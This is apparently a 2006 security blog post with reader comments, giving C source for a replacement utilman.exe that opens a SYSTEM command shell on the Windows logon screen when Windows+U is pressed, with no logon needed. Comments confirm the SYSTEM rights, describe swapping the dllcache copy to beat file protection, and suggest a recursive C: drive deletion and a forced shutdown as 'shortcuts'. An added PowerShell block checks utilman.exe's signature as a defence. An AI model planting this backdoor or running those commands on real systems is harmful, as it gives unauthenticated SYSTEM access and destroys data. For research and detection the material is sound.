Comments posted by evilbitz on my Playing with utilman.exe post gave me a great idea for another experiment with utilman.exe:
You can compile the following example with Borland’s free C++ 5.5 compiler.
Fourth experiment
Compile this simple C program, name it utilman.exe and put it in the system32 directory:
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <tchar.h>

int _tmain(void)
{
    STARTUPINFO s;
    PROCESS_INFORMATION p;
    LPTSTR szCmdline = _tcsdup(TEXT("CMD"));
    /* The desktop is "WinSta0\Winlogon": one backslash, written as \\ in C source
       (the doubled \\\\ in the first version of this post was a WordPress PRE artifact) */
    LPTSTR szDesktop = _tcsdup(TEXT("WinSta0\\Winlogon"));

    ZeroMemory(&s, sizeof(s));
    s.cb = sizeof(s);
    s.lpDesktop = szDesktop;   /* window station and desktop the new process is created on */
    ZeroMemory(&p, sizeof(p));

    if (CreateProcess(NULL, szCmdline, NULL, NULL, FALSE, CREATE_NEW_CONSOLE,
                      NULL, NULL, &s, &p))
    {
        /* we do not wait for the shell, we only release our handles to it */
        CloseHandle(p.hProcess);
        CloseHandle(p.hThread);
    }
    free(szCmdline);
    free(szDesktop);
    return 0;
}
Whenever you press the magic key sequence (Windows Logo key & U key), a command shell will open on the Winlogon desktop. And you don’t have to be logged on to do this.
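A defender's counterpart to the experiment above, as an added example that is not part of the original post: since the replacement utilman.exe is an unsigned binary without a version resource, this PowerShell check compares the Authenticode status, the signer and the SHA-256 of the copy in system32 against the dllcache copy (the XP-era path mentioned in the comments; the function name and the SystemRoot-relative paths are assumptions).

```powershell
# Added example (not from the original post): report whether utilman.exe still looks
# like the Microsoft-signed Utility Manager or has been swapped for a custom binary.
function Test-UtilmanIntegrity {
    $paths = @(
        (Join-Path $env:SystemRoot 'System32\utilman.exe'),
        (Join-Path $env:SystemRoot 'System32\dllcache\utilman.exe')   # present on XP/2003 only
    )
    $sha256 = [System.Security.Cryptography.SHA256]::Create()
    foreach ($p in $paths) {
        if (-not (Test-Path -LiteralPath $p)) {
            [pscustomobject]@{ Path = $p; Present = $false; Suspicious = $false; Reason = 'not present' }
            continue
        }
        $sig     = Get-AuthenticodeSignature -FilePath $p
        $bytes   = [System.IO.File]::ReadAllBytes($p)
        $hash    = ([System.BitConverter]::ToString($sha256.ComputeHash($bytes))) -replace '-', ''
        $signer  = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '<none>' }
        $company = (Get-Item -LiteralPath $p).VersionInfo.CompanyName
        $reasons = @()
        if ($sig.Status -ne 'Valid')             { $reasons += "signature status $($sig.Status)" }
        if ($signer -notlike '*Microsoft*')      { $reasons += "signer $signer" }
        if ($company -notlike 'Microsoft*')      { $reasons += "CompanyName '$company'" }   # heuristic: a home-built exe has no version resource
        [pscustomobject]@{
            Path       = $p
            Present    = $true
            SHA256     = $hash
            Signer     = $signer
            Suspicious = ($reasons.Count -gt 0)
            Reason     = ($reasons -join '; ')
        }
    }
}

$results = Test-UtilmanIntegrity
$results | Format-Table Path, Suspicious, Reason -AutoSize
# The system32 and dllcache copies should also carry the same hash when both exist
$hashes = $results | Where-Object Present | Select-Object -ExpandProperty SHA256 -Unique
if ($hashes.Count -gt 1) { Write-Warning 'utilman.exe differs between System32 and dllcache' }
```

On older PowerShell versions the catalog-signed system copy can report NotSigned rather than Valid, so treat the signer and version-resource results together rather than relying on the status alone.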
What user account does the shell run as? If it is system then there is a huge security hole.
Comment by Jay — Friday 1 September 2006 @ 14:14
It’s the SYSTEM account, read this: https://didierstevens.wordpress.com/2006/08/21/playing-with-utilmanexe/
Comment by Didier Stevens — Friday 1 September 2006 @ 16:28
It doesn’t matter on which desktop the cmd runs.
utilman.exe always runs as SYSTEM.
Nice man 😉
Comment by evilbitz — Friday 1 September 2006 @ 20:00
[…] For a demo of My second playdate with utilman.exe, go here on YouTube. […]
Pingback by Playing with utilman.exe, The Motion Picture « Didier Stevens — Tuesday 5 September 2006 @ 10:00
Hi, I compiled your script with no error, replaced it in dllcache and system32, blocked sfc when prompted to restore, but when I press “Windows key” + U, nothing. Your scripts in the 3 examples work, but not the last one with CMD.
Comment by Jacky — Wednesday 16 April 2008 @ 13:56
The example only works for me when
LPTSTR szDesktop = _tcsdup(TEXT("WinSta0\\\\Winlogon"));
is replaced with
LPTSTR szDesktop = _tcsdup(TEXT("WinSta0\\Winlogon"));
The \ has to be doubled (not quadrupled) for masking.
Comment by MF — Tuesday 6 October 2009 @ 7:03
Yes, \\. The \\\\ stems from an old issue with the PRE format in WordPress.
Comment by Didier Stevens — Tuesday 6 October 2009 @ 19:06
Wow, I guess the best way to protect against this is either TrueCrypt or replacing Windows with Linux? XD
This makes for some handy shortcuts i.e.
The nuke rd c:\ /s /q “why isnt my narrator working!? :P”
hide shutdown -s -f -t 00
Dude, how about using your programming to make a visible Firefox, or better yet, for those chronic PC gamers, a lazy man's button to instantly launch a visible game while killing all unsanitary processes… ohh yess
Comment by dooshy — Tuesday 25 October 2011 @ 22:39